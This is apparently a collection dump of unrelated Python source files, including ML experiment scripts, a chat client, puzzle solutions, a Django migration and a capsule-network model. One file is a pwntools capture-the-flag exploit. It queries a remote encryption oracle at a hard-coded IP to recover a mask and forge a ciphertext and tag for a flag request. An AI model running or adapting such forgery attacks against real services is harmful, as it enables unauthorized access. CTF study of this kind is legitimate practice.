    For each random dataset and hidden-layer width, computes ground-truth
    LOO importances plus influence / SHAP / permutation attributions, then
    stores recovery accuracies and rank/linear correlations, checkpointing
    the result arrays to ./results every 100 datasets.
    """
    n_datasets = 10000
    nodes = [100, 500, 1000, 2000, 5000]
    epochs = [300, 300, 350, 350, 350]
    # axes: [dataset, width, metric]; accuracy stores (train, test, infl, shap, perm)
    accuracy_results = np.empty((n_datasets, len(nodes), 5))
    spearman_stats = np.empty((n_datasets, len(nodes), 3))
    spearman_pvalues = np.empty((n_datasets, len(nodes), 3))
    pearson_stats = np.empty((n_datasets, len(nodes), 3))
    pearson_pvalues = np.empty((n_datasets, len(nodes), 3))
    for i in range(n_datasets):
        dataset = gen_data()
        for j in range(len(nodes)):
            truth, classifier, (tt_acc), dataset = train_net(dataset, nodes[j], epochs[j])
            print('Finished Truth')
            influences = normalize(influence_approx(dataset, classifier).reshape(1, -1))[0]
            print('Finished Influence')
            shap_values = np.mean(np.mean(np.dstack(gradient_shap(dataset, classifier)), axis=2), axis=0).squeeze()
            print('Finished SHAP')
            permutation = permutation_importance(dataset, classifier)
            print('Finished Permutation')
            infl_acc, shap_acc, permute_acc = get_accs(dataset[0].shape[1], (influences, shap_values, permutation))
            # BUG FIX: this previously called get_spearman, so the "pearson"
            # arrays silently duplicated the Spearman statistics.
            pearson_stat, pearson_pvalue = get_pearson(truth, tt_acc[1], (influences, shap_values, permutation))
            spearman_stat, spearman_pvalue = get_spearman(truth, tt_acc[1], (influences, shap_values, permutation))
            accuracy_results[i, j, :] = [tt_acc[0].item(), tt_acc[1].item(), infl_acc, shap_acc, permute_acc]
            spearman_stats[i, j, :] = spearman_stat
            spearman_pvalues[i, j, :] = spearman_pvalue
            pearson_stats[i, j, :] = pearson_stat
            pearson_pvalues[i, j, :] = pearson_pvalue
        print('{}/{}'.format(i, n_datasets))
        # periodic checkpoint so a crash mid-run does not lose everything
        if i % 100 == 0:
            np.save(os.getcwd()+ '/results/accuracies_width_{}.npy'.format(i), accuracy_results)
            np.save(os.getcwd()+ '/results/pearson_width_{}.npy'.format(i), pearson_stats)
            np.save(os.getcwd() + '/results/pearson_pvalue_width_{}.npy'.format(i), pearson_pvalues)
            np.save(os.getcwd() + '/results/spearman_width_{}.npy'.format(i), spearman_stats)
            np.save(os.getcwd() + '/results/spearman_pvalue_width_{}.npy'.format(i), spearman_pvalues)
    np.save(os.getcwd() + '/results/accuracies_width_final.npy', accuracy_results)
    np.save(os.getcwd() + '/results/pearson_width_final.npy', pearson_stats)
    np.save(os.getcwd() + '/results/pearson_pvalue_width_final.npy', pearson_pvalues)
    np.save(os.getcwd() + '/results/spearman_width_final.npy', spearman_stats)
    np.save(os.getcwd() + '/results/spearman_pvalue_width_final.npy', spearman_pvalues)
if __name__ == '__main__':
main()
|
993,477 | a3345bbd63cab053cb7ae34e2a2d8ef77c261444 | import socket
import sys
from gui import ClientGUI
# Create a new client socket and connect to the server
def create_connection(server_address):
    """Open a TCP connection to the (host, port) tuple and return the socket."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(server_address)
    return sock
# create components, start threads
def run(server_ip, server_port):
    """Connect to the chat server and hand the socket to the GUI.

    ClientGUI is expected to own the application loop from here on
    (presumably blocking until the window closes — confirm in gui.py).
    """
    client = create_connection((server_ip, server_port))
    # create a GUI class object, which bears the application loop
    gui = ClientGUI(client)
# CLI entry point: expects exactly <serverip> <serverport>.
if __name__ == "__main__":
    if len(sys.argv) == 3:
        server_ip = sys.argv[1]
        server_port = int(sys.argv[2])
        run(server_ip, server_port)
    else:
        print('Usage: python3 client.py <serverip> <serverport>')
|
993,478 | 12229bd529d9b4773f911c88f0846ca7338de451 | import sys
# Redirect stdin to the puzzle input file; dr/dc are the 4-neighborhood offsets
# (up, down, left, right) used by dfs().
sys.stdin = open('21_input.txt')
dr = [-1, 1, 0, 0]
dc = [0, 0, -1, 1]
def dfs(sr, sc):
    """Flood-fill the connected component of 1-cells containing (sr, sc).

    Iterative stack-based traversal over the global N x N grid `arr`.
    Marks cells in the global `visited` matrix and appends the component
    size to the global list `L`.
    """
    global arr, visited, N, L, count
    S = [(sr, sc)]
    visited[sr][sc] = 1
    # num counts stack-pop rounds; cells are stamped with the round in which
    # they were discovered (any non-zero value means "visited").
    num = 1
    cnt = 1
    while S:
        r, c = S.pop()
        for i in range(4):
            nr = r + dr[i]
            nc = c + dc[i]
            if not (0 <= nr < N and 0 <= nc <N):
                continue
            if arr[nr][nc] == 0:
                continue
            if visited[nr][nc]:
                continue
            S.append((nr, nc))
            visited[nr][nc] = num
            cnt += 1
        num += 1
    L.append(cnt)
# Read an N x N grid of digits (one row per line), count the connected
# components of 1s, then print the count followed by the component sizes
# in ascending order.
N = int(input())
arr = [list(map(int, input())) for _ in range(N)]
visited = [[0] * N for _ in range(N)]
L = []
count = 0
for i in range(N):
    for j in range(N):
        if arr[i][j] == 1 and visited[i][j] == 0:
            dfs(i, j)
            count += 1
print(count)
for i in sorted(L):
    print(i)
993,479 | c6c80390c5c245e105004c12d621411309525015 | #!/usr/bin/env python3
#-------------------------------------------------------------------------------
# O(n) solution
class Solution(object):
    def addDigits(self, num):
        """Repeatedly sum the decimal digits of num until a single digit remains.

        :type num: int
        :rtype: int
        """
        if num < 10:
            return num
        digit_sum = sum(int(ch) for ch in str(num))
        return self.addDigits(digit_sum)
#-------------------------------------------------------------------------------
# O(1) Solution
class Solution(object):
    def addDigits(self, num):
        """Digital root in O(1): for positive num the result is 1 + (num - 1) % 9."""
        return 0 if num == 0 else 1 + (num - 1) % 9
#-------------------------------------------------------------------------------
|
993,480 | 1c4845a52823c04fefa6aa15b2d13ff4ea66c940 | string = input("Mata in en textsträng: ").lower().replace(" ", "")
# `string` is read above, lower-cased with spaces stripped; print its length,
# then report (in Swedish) whether it reads the same forwards and backwards.
print(f"{len(string)}")
if string == string[::-1]:
    print("Textsträngen är en palindrom")
else:
    print("Textsträngen är inte en palindrom")
993,481 | d2ef86a0137816a2569ad2bdbd3b75c65817ae62 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-03-07 12:17
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: adds the Attachment model and drops
    Article.cover_url.  Verbose names are \\u-escaped Chinese labels; do not
    hand-edit applied migrations.
    """

    dependencies = [
        ('cms', '0006_auto_20160305_2005'),
    ]

    operations = [
        migrations.CreateModel(
            name='Attachment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200, verbose_name='\u540d\u79f0')),
                ('intro', models.TextField(blank=True, null=True, verbose_name='\u7b80\u4ecb')),
                ('content', models.FileField(upload_to='uploads/', verbose_name='\u5185\u5bb9')),
            ],
            options={
                'verbose_name': '\u6587\u4ef6',
                'verbose_name_plural': '\u6587\u4ef6',
            },
        ),
        migrations.RemoveField(
            model_name='article',
            name='cover_url',
        ),
    ]
|
993,482 | 1cf3d27d0b454b25874058bff88f978dea00e29d | #!/local/anaconda/bin/python
# IMPORTANT: leave the above line as is.
import logging
import sys
import numpy as np

# Reducer: average coefficient vectors read from stdin.
# Each input line is "key, v0 v1 v2 ..."; the output is one space-joined
# line of averaged coefficients.
lines = 0
avgs = None
for line in sys.stdin:
    line = line.strip()
    if not line:
        # robustness: a blank line previously crashed the unpacking below
        continue
    k, v = line.split(', ')
    coef = np.fromstring(v, sep=" ", dtype='double')
    if avgs is None:
        avgs = np.zeros(coef.size)
    lines += 1
    # vectorized accumulation (was a Python-2-only xrange element loop,
    # which broke under Python 3 even though the script uses print())
    avgs += coef
if avgs is not None:
    avgs /= lines
    # avoid shadowing the builtin `list`; generator is enough for join()
    print(' '.join(str(f) for f in avgs.tolist()))
993,483 | 4f162792fdb26dc061a5c48a21933586afd76f67 | from pwn import *
BLOCKSIZE = 16


def xor(a, b):
    """Byte-wise XOR of two byte strings, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


class Block:
    """A BLOCKSIZE-byte block supporting the left-shift-and-reduce doubling
    used by block-cipher tweak schedules (conditional XOR with 0x87)."""

    def __init__(self, data=b''):
        self.data = data

    def double(self):
        """Shift the block left by one bit; if the top bit was set, XOR in 0x87."""
        assert len(self.data) == BLOCKSIZE
        value = int.from_bytes(self.data, 'big')
        bits = BLOCKSIZE * 8
        carry = value >> (bits - 1)
        value = (value << 1) & ((1 << bits) - 1)
        if carry:
            value ^= 0b10000111
        return Block(value.to_bytes(BLOCKSIZE, 'big'))
# CTF exploit script: talks to a remote encryption oracle over three menu
# options (1 = encrypt, 2 = decrypt?, 3 = submit forgery) to recover the
# cipher's masking value L and forge a tag for b'giveme flag.txt'.
# NOTE(review): the protocol details below mirror the remote challenge
# binary; statement order is load-bearing — do not reorder.
r = remote('34.82.101.212', 20000)
r.sendlineafter('> ', '1')
nonce = bytes.fromhex('0'*32)
target = bytes.fromhex('0'*30+'01')
plain = target + int(128).to_bytes(16, 'big') + nonce
r.sendlineafter('nonce = ',nonce.hex())
r.sendlineafter('plain = ',plain.hex())
c = bytes.fromhex(r.recvline()[9:-1].decode())
t = bytes.fromhex(r.recvline()[6:-1].decode())
# Second query: modified ciphertext with the tag re-masked by the nonce.
r.sendlineafter('> ', '2')
r.sendlineafter('nonce = ',nonce.hex())
r.sendlineafter('cipher = ',(c[:16]+xor(c[16:32],xor(target, int(128).to_bytes(16, 'big')))).hex())
r.sendlineafter('tag = ',xor(c[32:],nonce).hex())
a = r.recvline()
m = bytes.fromhex(r.recvline()[8:-1].decode())
# Recover L by undoing one doubling step (inverse of Block.double).
L = int.from_bytes(bytes([x ^ y for x, y in zip(m[16:],int(129).to_bytes(16, 'big'))]), 'big')
if L % 2:
    L ^= 0b10000111
    L //= 2
    L += 2**127
else:
    L //= 2
L = bytes.fromhex(hex(L)[2:].rjust(32,'0'))
nonce = xor(target,L)
L = xor(c[:16],L)
L2= Block(L).double().data
L4= Block(L2).double().data
newL4 = L4
L4s = []
# Build a plaintext containing every possible final-byte padding candidate.
p = int(120).to_bytes(16,'big')
for i in range(256):
    s = b'giveme flag.txt'+i.to_bytes(1,'big')
    s2 = xor(xor(s, L2), L4)
    p += xor(s2, newL4)
    L4s.append(newL4)
    newL4 = Block(newL4).double().data
r.sendlineafter('> ', '1')
r.sendlineafter('nonce = ',nonce.hex())
r.sendlineafter('plain = ',(p+nonce).hex())
c2 = bytes.fromhex(r.recvline()[9:-1].decode())
t2 = bytes.fromhex(r.recvline()[6:-1].decode())
# The pad's last byte selects which candidate block carries the valid tag.
pad = xor(c2[:16],L2)
i = pad[-1]
c_ans = xor(pad, b'giveme flag.txt')
t_ans = xor(c2[16*(i+1):16*(i+2)], L4s[i])
#print(nonce.hex(), c_ans.hex(), t_ans.hex())
r.sendlineafter('> ', '3')
r.sendlineafter('nonce = ',nonce.hex())
r.sendlineafter('cipher = ',c_ans.hex())
r.sendlineafter('tag = ',t_ans.hex())
r.interactive()
|
993,484 | 3ef0e3e1797aa0603712d2b6df408c6d6be9cc0b | import argparse
import copy
import logging
import os
import sys
import time
from pathlib import Path
from typing import Callable, Iterable, List, Union
import pytorch_lightning as pl
import wandb
from hydra import compose, initialize, initialize_config_dir
from hydra.utils import instantiate, to_absolute_path
from omegaconf import OmegaConf, open_dict
from src.utils.exptool import (
Experiment,
prepare_trainer_config,
print_config,
register_omegaconf_resolver,
)
# Module-level setup: install the project's OmegaConf resolvers, configure
# root logging, and remember the directory containing this script (used by
# test_example to locate the hydra conf/ directory).
register_omegaconf_resolver()
logging.basicConfig(
    format="[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s",
    level=logging.INFO,
)
logger = logging.getLogger(__name__)
main_dir = Path(__file__).resolve().parent
# ======================================================
# testing override functions
# ======================================================
def default_override(config):
    """Overrides applied to every test run: single-node/single-device trainer
    and a doubled batch size (testing has no backward pass)."""
    trainer_cfg = config.pl_trainer
    trainer_cfg.num_nodes = 1
    trainer_cfg.devices = 1
    config.dataset.batch_size = 2 * config.dataset.batch_size
    return config
def test_original(config):
    """Identity override: evaluate the experiment with its original config."""
    return config
def test_example(config):
    """Example override: swap in the dataset from the mnist_lenet experiment.

    Composes the hydra `train` config from this repo's conf/ directory and
    copies its dataset node onto the loaded experiment config.
    """
    config_dir = main_dir / "conf"
    with initialize_config_dir(config_dir=str(config_dir)):
        cfg = compose(config_name="train", overrides=["experiment=mnist_lenet"])
    # For example, test the model on a different dataset.
    # (Just for example, actually they share the same dataset here.)
    config.dataset = cfg.dataset
    return config
# ======================================================
# end of testing override functions
# ======================================================
# ======================================================
# testing pipeline
# ======================================================
def test(
    logdir: Union[str, Path],
    ckpt: Union[str, Path] = "best",
    update_config_func: Union[Callable, List[Callable]] = test_original,
    update_wandb: bool = False,
    wandb_entity: Union[str, None] = None,
    metrics_prefix: Union[str, List[str]] = "",
):
    """Re-evaluate a logged experiment checkpoint under one or more config overrides.

    For each (override function, metrics prefix) pair: rebuild the config,
    run trainer.test, append the prefixed metrics to <logdir>/results.jsonl,
    and optionally push them to the run's wandb summary.

    Parameters:
        logdir: experiment log directory (becomes the working directory).
        ckpt: checkpoint selector passed to the experiment loader.
        update_config_func: override function(s) applied on top of default_override.
        update_wandb: if True, write results into the wandb run summary.
        wandb_entity: wandb entity used to resolve the run.
        metrics_prefix: prefix(es) for result keys; broadcast if a single value
            is given for several override functions.
    """
    logdir = Path(logdir).expanduser()
    os.chdir(logdir)
    # load experiment record from logdir
    experiment = Experiment(logdir, wandb_entity=wandb_entity)
    # deal with update_config_func & metrics_prefix
    if not isinstance(update_config_func, Iterable):
        update_config_func = [update_config_func]
    if isinstance(metrics_prefix, str):
        metrics_prefix = [metrics_prefix]
    if len(metrics_prefix) == 1 and len(update_config_func) > 1:
        metrics_prefix = [metrics_prefix[0]] * len(update_config_func)
    assert len(update_config_func) == len(
        metrics_prefix
    ), "update_config_func and metrics_prefix must have the same length"
    for func, prefix in zip(update_config_func, metrics_prefix):
        # override experiment config with default_override & update_config_func
        config = copy.deepcopy(experiment.config)
        OmegaConf.set_struct(config, True)
        with open_dict(config):
            config = default_override(config)
            if func is not None:
                logger.info(
                    f"\n===== Override experiment config with {func.__name__} ====="
                )
                config = func(config)
        # show experiment config
        print_config(config)
        # seed everything
        pl.seed_everything(config.seed)
        # initialize datamodule
        datamodule = instantiate(config.dataset)
        # initialize model
        pipeline = experiment.get_pipeline_model_loaded(ckpt, config=config)
        # initialize trainer
        cfg_trainer = prepare_trainer_config(config, logging=False)
        trainer = pl.Trainer(**cfg_trainer)
        # testing
        results = trainer.test(pipeline, datamodule=datamodule)
        # only rank 0 writes files / wandb to avoid duplicate records in DDP
        if trainer.global_rank == 0:
            # log results, joining prefix and key with "_" unless already present
            prefix_link = (
                "" if len(prefix) == 0 or prefix.endswith("_") else "_"
            )
            results = [
                {
                    f"{prefix}{prefix_link}{key}": val
                    for key, val in result.items()
                }
                for result in results
            ]
            logger.info(f"{results}")
            # save results to file (append-only jsonl-style record per run)
            with open(logdir / "results.jsonl", "a") as f:
                record = {
                    "results": results,
                    "date": time.strftime("%Y-%m-%d %H:%M:%S"),
                    "func": func.__name__ if func is not None else "original",
                    "prefix": prefix,
                }
                f.write(f"{record}\n")
            # update wandb record
            if update_wandb:
                logger.info("update wandb.")
                api = wandb.Api()
                run = api.run(experiment.wandb_run_path)
                for result in results:
                    run.summary.update(result)
# ======================================================
# end of testing pipeline
# ======================================================
# CLI entry point: resolve override-function names to module attributes,
# then run the testing pipeline.
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("logdir")
    parser.add_argument("--ckpt", default="last")
    parser.add_argument(
        "--update_func",
        nargs="+",
        default=["test_original"],
        help="config update function",
    )
    parser.add_argument("--update_wandb", action="store_true")
    parser.add_argument("--entity", default=None)
    parser.add_argument(
        "--prefix", nargs="+", default="", help="wandb metrics prefix"
    )
    args = parser.parse_args()
    # name to funcs
    if args.update_func is None:
        # BUG FIX: previously this branch left `update_config_func` unassigned,
        # raising NameError at the test(...) call below.
        update_config_func = [None]
    else:
        mod = sys.modules[__name__]
        update_config_func = [getattr(mod, func) for func in args.update_func]
    test(
        args.logdir,
        ckpt=args.ckpt,
        update_config_func=update_config_func,
        update_wandb=args.update_wandb,
        wandb_entity=args.entity,
        metrics_prefix=args.prefix,
    )
|
993,485 | 8c236a9ed17f524841c80bed7decca8d2f4249e5 | """ GrantRevokeMenu class module.
"""
from functools import partial
from typing import List, Callable, Tuple
from http.client import HTTPException
from dms2021client.data.rest import AuthService
from dms2021client.presentation.orderedmenu import OrderedMenu
from dms2021client.data.rest.exc import NotFoundError, UnauthorizedError
from colorama import Fore # type: ignore
class GrantRevokeMenu(OrderedMenu):
    """ Menu for granting (option 1) or revoking (option 2) user rights.
    """
    # Class-level default; set_items rebinds it as an instance attribute
    # after prompting for a username.
    _username: str = ""
    def __init__(self, session_token: str, auth_service: AuthService, option: int):
        """ Constructor method.
        Initializes the variables.
        ---
        Parameters:
            - session_token: The session token string of the current user.
            - auth_service: REST client used to reach the authentication service.
            - option: 1, grant; 2, revoke.
        """
        self.__session_token: str = session_token
        self.__authservice: AuthService = auth_service
        self.__option: int = option
        # When True, subsequent set_items calls reuse the previously
        # entered username instead of prompting again.
        self.__repeat = False
    def set_title(self) -> None:
        """ Sets the menu title according to the grant/revoke option.
        """
        if self.__option == 1:
            self._ordered_title = "AÑADIR PERMISOS"
        else:
            self._ordered_title = "ELIMINAR PERMISOS"
    def set_items(self) -> None:
        """ Prompts for a username (first time only) and sets the menu items
        to the rights that can be granted/revoked for that user.
        """
        if not self.__repeat:
            self._username: str = input("Introduzca el nombre del usuario: ")
        self._ordered_items = self.get_rights()[0]
        if not self._ordered_items:
            if self.__option == 1:
                self.print_error("El usuario ya tiene todos los permisos.")
                return
            self.print_error("El usuario no tiene ningún permiso.")
            return
    def set_opt_fuctions(self) -> None:
        """ Sets the callbacks executed when a menu option is selected.
        """
        self._ordered_opt_functions = self.get_rights()[1]
    def get_rights(self) -> Tuple[List[str], List[Callable]]:
        """ Computes the rights that apply to the current user and option.

        With option 1 (grant) it returns the rights the user does NOT have;
        with option 2 (revoke) the rights the user HAS.
        Returns:
            - right_result: The list of applicable right names.
            - functions: One manage_rights partial per right, paired by index.
        """
        rights: List[str] = ["AdminRights", "AdminUsers", "AdminRules", "AdminSensors",
                             "ViewReports"]
        functions: List[Callable] = []
        right_result: List[str] = []
        for i in rights:
            if self.__authservice.has_right(self._username, i) and self.__option == 2:
                right_result.append(i)
                fun = partial(self.manage_rights, i, False)
                functions.append(fun)
            elif not self.__authservice.has_right(self._username, i) and self.__option == 1:
                right_result.append(i)
                fun = partial(self.manage_rights, i)
                functions.append(fun)
        return right_result, functions
    def manage_rights(self, right: str, grant: bool = True):
        """ Grants or revokes a single right, reporting the outcome on screen.
        ---
        Parameters:
            - right: Right to be revoked or granted.
            - grant: False, revoke; True, grant.
        """
        try:
            if not grant:
                self.__authservice.revoke(self._username, right, self.__session_token)
                print(Fore.GREEN
                      + f"El permiso {right} ha sido eliminado del usuario {self._username}.\n"
                      + Fore.RESET)
            else:
                self.__authservice.grant(self._username, right, self.__session_token)
                print(Fore.GREEN
                      + f"El permiso {right} ha sido añadido al usuario {self._username}.\n"
                      + Fore.RESET)
            self.__repeat = True
        except UnauthorizedError:
            self.print_error("Usted no tiene permiso para cambiar permisos.")
        except NotFoundError:
            self.print_error("No se pueden modificar permisos de un usuario inexistente.")
        except HTTPException:
            self.print_error("Ha ocurrido un error inesperado.")
|
993,486 | becb8c2b9f90a8ba5fd7429ff745d527b363c06f | # -*- coding: utf8 -*-
import sys
from time import sleep
from snapconnect import snap
# Serial transport used for all SNAPconnect connections (RS-232).
SERIAL_TYPE = snap.SERIAL_TYPE_RS232
class BridgeVersionClient(object):
    """Python 2 SNAPconnect client that sends packets to a display node over
    a serial bridge.  Russian comments translated to English; the protocol
    constants in _prnstr are a debugging aid for the display's byte protocol.
    """
    def __init__(self, path, nodeAddress, message):
        print 'init conn2'
        self.path=path
        self.nodeAddress=nodeAddress
        self.message=message
        # Create the SnapConnect instance
        self.comm = snap.Snap(funcs = {'reportLightState': self.start})
        self.comm.set_hook(snap.hooks.HOOK_SNAPCOM_OPENED, self.hook_open)
        self.comm.set_hook(snap.hooks.HOOK_SNAPCOM_CLOSED, self.hook_closed)
        #self.comm.set_hook(snap.hooks.HOOK_10MS, self.make_poll)
        self.comm.loop()
    def start(self, m):
        # RPC callback registered as 'reportLightState'.
        print 'm'
        self.comm.poll()
    def make_poll(self):
        self.comm.poll()
    # NOTE(review): hook_open/hook_closed lack `self`; SNAPconnect passes the
    # instance as the first positional arg, swallowed by *args.
    def hook_open(*args):
        print "SNAPCOM OPENED: %r" % (args,)
        print 'open'
    def hook_closed(*args):
        print "SNAPCOM CLOSED: %r" % (args,)
        print 'closed'
    def sendMessage(self, packet):
        # Open the serial port at the given path
        self.comm.open_serial(SERIAL_TYPE, self.path)
        # Send each message to the node via RPC
        for message in packet:
            self._prnstr(message)
            a=self.comm.rpc(self.nodeAddress, 'writePacket', message)
            print 'snap ', a
            self.comm.poll()
            sleep(1)
        #self.comm.poll()
        self.comm.loop()
        #self.comm.set_hook(snap.hooks.HOOK_RPC_SENT)
        #snap.Snap.set_hook(snap.hooks.HOOK_RPC_SENT)
        #def a(self, p1, p2):
        #print 'hook ', p1, p2
        #self.comm.loop()
        #for b in message:
        #    self.comm.rpc(self.nodeAddress, 'sendPacket', b, 200)
        #    self.comm.poll()
        #    sleep(0.3)
        #self.comm.loop()
        #self.stop()
    def clearScreen(self):
        # Open the serial port at the given path
        self.comm.open_serial(SERIAL_TYPE, self.path)
        # Send the clear command to the node via RPC
        print 'sending clear'
        self.comm.rpc(self.nodeAddress, 'clear1')
        #self.comm.poll()
        self.comm.loop()
        #sleep(2)
        #self.stop()
    def stop(self):
        """Stop the SNAPconnect instance."""
        print 'closing'
        self.comm.close_all_serial() # Close all serial connections opened with SNAPconnect
        print 'closed'
        sys.exit(0) # Exit the program
    def _prnstr(self, outstr):
        # Debug dump: print each byte of the outgoing packet with a mnemonic
        # for known protocol control bytes.
        print outstr
        for i in range (0, len(outstr)):#st in outstr:
            st=outstr[i]
            newLabel = ord(st)
            h=hex(newLabel)
            hh=(h[2:])
            if len(hh)<2:
                hh='0'+hh
            p=hh.decode('hex')
            s='n'
            if p=='\x00':
                s='0'
            elif p=='\x01':
                s='SOH'
            elif p=='\x02':
                s='STX'
            elif p=='\x41':
                s='WTF'
            elif p=='\x1B':
                s='1B'
            elif p=='\x30':
                s='DisP:0'
            elif p=='\x20':
                s='20'
            elif p=='\x45':
                s='WrSpecFunk'
            elif p=='\x24':
                s='ClearMem'
            elif p=='\x55':
                s='IR'
            elif p=='\x04':
                s='EOT'
            elif p=='\x1C':
                s='setColor'
            s=s+' | '
            print s,
993,487 | a024d48d3b125cb2cf78c7f11bab50a41c1a64ab | class Solution:
def bitwiseComplement(self, N: int) -> int:
if N==0:
return 1
cur=1
rep=0
while N>0:
if N&1==1:
cur*=2
N>>=1
else:
rep+=cur
cur*=2
N>>=1
return rep
|
993,488 | b304e1f8654aade278502eec132151546e453969 | from __future__ import print_function
import os
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.utils.data
from torch.autograd import Variable
import torch.nn.functional as F
from collections import OrderedDict
import numpy as np
import sys
# Make the bundled nndistance extension importable and create the Chamfer
# distance module used by PointCapsNet.reconstruction_loss.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(BASE_DIR, 'nndistance'))
from models.nndistance.modules.nnd import NNDModule
distChamfer = NNDModule()
USE_CUDA = True
class ConvLayer(nn.Module):
    """Point-wise feature extractor: two 1x1 Conv1d + BatchNorm + ReLU stages
    lifting each point from 6 channels to 128."""
    def __init__(self):
        super(ConvLayer, self).__init__()
        # (2048,6)
        self.conv1 = torch.nn.Conv1d(6, 64, 1) # Conv1D
        self.conv2 = torch.nn.Conv1d(64, 128, 1)
        self.bn1 = nn.BatchNorm1d(64) # Norm
        self.bn2 = nn.BatchNorm1d(128)
    def forward(self, x):
        # x: (batch, 6, num_points) -> (batch, 128, num_points)
        x = F.relu(self.bn1(self.conv1(x)))
        x = F.relu(self.bn2(self.conv2(x)))
        # print(x.size()) (4,128,2048)
        return x
class PrimaryPointCapsLayer(nn.Module):
    """Primary capsules: prim_vec_size parallel Conv1d->BN->MaxPool branches,
    stacked and squashed into capsule vectors."""
    def __init__(self, prim_vec_size=8, num_points=2048):
        super(PrimaryPointCapsLayer, self).__init__()
        # prim_vec_size parallel branches (16 in this file's configuration)
        self.capsules = nn.ModuleList([
            torch.nn.Sequential(OrderedDict([
                ('conv3', torch.nn.Conv1d(128, 1024, 1)), # (4,1024,2048)
                ('bn3', nn.BatchNorm1d(1024)), # Norm
                ('mp1', torch.nn.MaxPool1d(num_points)), # (4,1024,1)
            ]))
            for _ in range(prim_vec_size)])
    def forward(self, x):
        u = [capsule(x) for capsule in self.capsules] # one pooled map per capsule branch
        # print("u[0].size" , u[0].size())
        # (4,1024,1)
        u = torch.stack(u, dim=2)
        # print(u.size())
        return self.squash(u.squeeze())
    # activation
    def squash(self, input_tensor):
        """Capsule squashing nonlinearity: shrinks vector norms into [0, 1)."""
        squared_norm = (input_tensor ** 2).sum(-1, keepdim=True)
        # print("square",squared_norm.size())
        # (4,1024,1)
        output_tensor = squared_norm * input_tensor / \
            ((1. + squared_norm) * torch.sqrt(squared_norm))
        # keep a batch dimension when squeeze() collapsed a batch of 1
        if (output_tensor.dim() == 2):
            output_tensor = torch.unsqueeze(output_tensor, 0)
        return output_tensor
class LatentCapsLayer(nn.Module):
    """Latent capsule layer with dynamic routing-by-agreement (3 iterations).

    Requires CUDA: the routing logits b_ij are allocated with .cuda().
    """
    def __init__(self, latent_caps_size=16, prim_caps_size=1024, prim_vec_size=16, latent_vec_size=64):
        super(LatentCapsLayer, self).__init__()
        self.prim_vec_size = prim_vec_size
        self.prim_caps_size = prim_caps_size
        self.latent_caps_size = latent_caps_size
        # transformation matrices mapping primary capsule vectors to latent space
        self.W = nn.Parameter(0.01 * torch.randn(latent_caps_size, prim_caps_size, latent_vec_size, prim_vec_size))
        # self.W.requires_grad=False
        # self.W = 0.01*torch.randn(latent_caps_size, prim_caps_size, latent_vec_size, prim_vec_size).cuda()
        # self.W.requires_grad_(True)
    def forward(self, x):
        u_hat = torch.squeeze(torch.matmul(self.W, x[:, None, :, :, None]), dim=-1)
        # print(u_hat.requires_grad) True
        # detached copy: gradients flow through u_hat only on the last iteration
        u_hat_detached = u_hat.detach()
        # print(u_hat_detached.requires_grad) false
        b_ij = Variable(torch.zeros(x.size(0), self.latent_caps_size, self.prim_caps_size)).cuda()
        num_iterations = 3
        for iteration in range(num_iterations):
            c_ij = F.softmax(b_ij, 1)
            if iteration == num_iterations - 1:
                v_j = self.squash(torch.sum(c_ij[:, :, :, None] * u_hat, dim=-2, keepdim=True))
            else:
                v_j = self.squash(torch.sum(c_ij[:, :, :, None] * u_hat_detached, dim=-2, keepdim=True))
                b_ij = b_ij + torch.sum(v_j * u_hat_detached, dim=-1)
        return v_j.squeeze(-2)
    def squash(self, input_tensor):
        """Capsule squashing nonlinearity (same form as PrimaryPointCapsLayer)."""
        squared_norm = (input_tensor ** 2).sum(-1, keepdim=True)
        output_tensor = squared_norm * input_tensor / \
            ((1. + squared_norm) * torch.sqrt(squared_norm))
        # print(output_tensor.size()) (4,32,1,16)
        return output_tensor
class PointGenCon(nn.Module):
    """Point-generation decoder primitive: four 1x1 Conv1d stages shrinking
    bottleneck_size down to 3 (xyz), Tanh-bounded output."""
    def __init__(self, bottleneck_size=2500):
        self.bottleneck_size = bottleneck_size
        super(PointGenCon, self).__init__()
        self.conv1 = torch.nn.Conv1d(self.bottleneck_size, self.bottleneck_size, 1)
        self.conv2 = torch.nn.Conv1d(self.bottleneck_size, int(self.bottleneck_size / 2), 1)
        self.conv3 = torch.nn.Conv1d(int(self.bottleneck_size / 2), int(self.bottleneck_size / 4), 1)
        self.conv4 = torch.nn.Conv1d(int(self.bottleneck_size / 4), 3, 1)
        self.th = torch.nn.Tanh()
        self.bn1 = torch.nn.BatchNorm1d(self.bottleneck_size)
        self.bn2 = torch.nn.BatchNorm1d(int(self.bottleneck_size / 2))
        self.bn3 = torch.nn.BatchNorm1d(int(self.bottleneck_size / 4))
    def forward(self, x):
        # print(x.size()) (4,18,32)
        x = F.relu(self.bn1(self.conv1(x)))
        # print("1",x.size()) (4,18,32)
        x = F.relu(self.bn2(self.conv2(x)))
        # print("2",x.size()) (4,9,32)
        x = F.relu(self.bn3(self.conv3(x)))
        # print("3",x.size()) (4,4,32)
        x = self.th(self.conv4(x))
        # print("4",x.size()) (4,3,32)
        return x
class CapsDecoder(nn.Module):
    """AtlasNet-style decoder: nb_primitives PointGenCon patches, each fed the
    latent capsules concatenated with a random 2D grid; returns the
    concatenated point cloud and the mean over all patches.  Requires CUDA.
    """
    def __init__(self, latent_caps_size, latent_vec_size, num_points):
        super(CapsDecoder, self).__init__()
        self.latent_caps_size = latent_caps_size #32
        self.bottleneck_size = latent_vec_size #16
        self.num_points = num_points
        self.nb_primitives = int(num_points / latent_caps_size) #2048/32 = 64
        self.decoder = nn.ModuleList(
            [PointGenCon(bottleneck_size=self.bottleneck_size + 2) for i in range(0, self.nb_primitives)])
    def forward(self, x):
        #print(x.size()) (8,32,16)
        outs = []
        for i in range(0, self.nb_primitives):
            # random uniform 2D grid sampled fresh for each primitive
            rand_grid = Variable(torch.cuda.FloatTensor(x.size(0), 2, self.latent_caps_size))
            #print(rand_grid.size()) #(8,2,32)
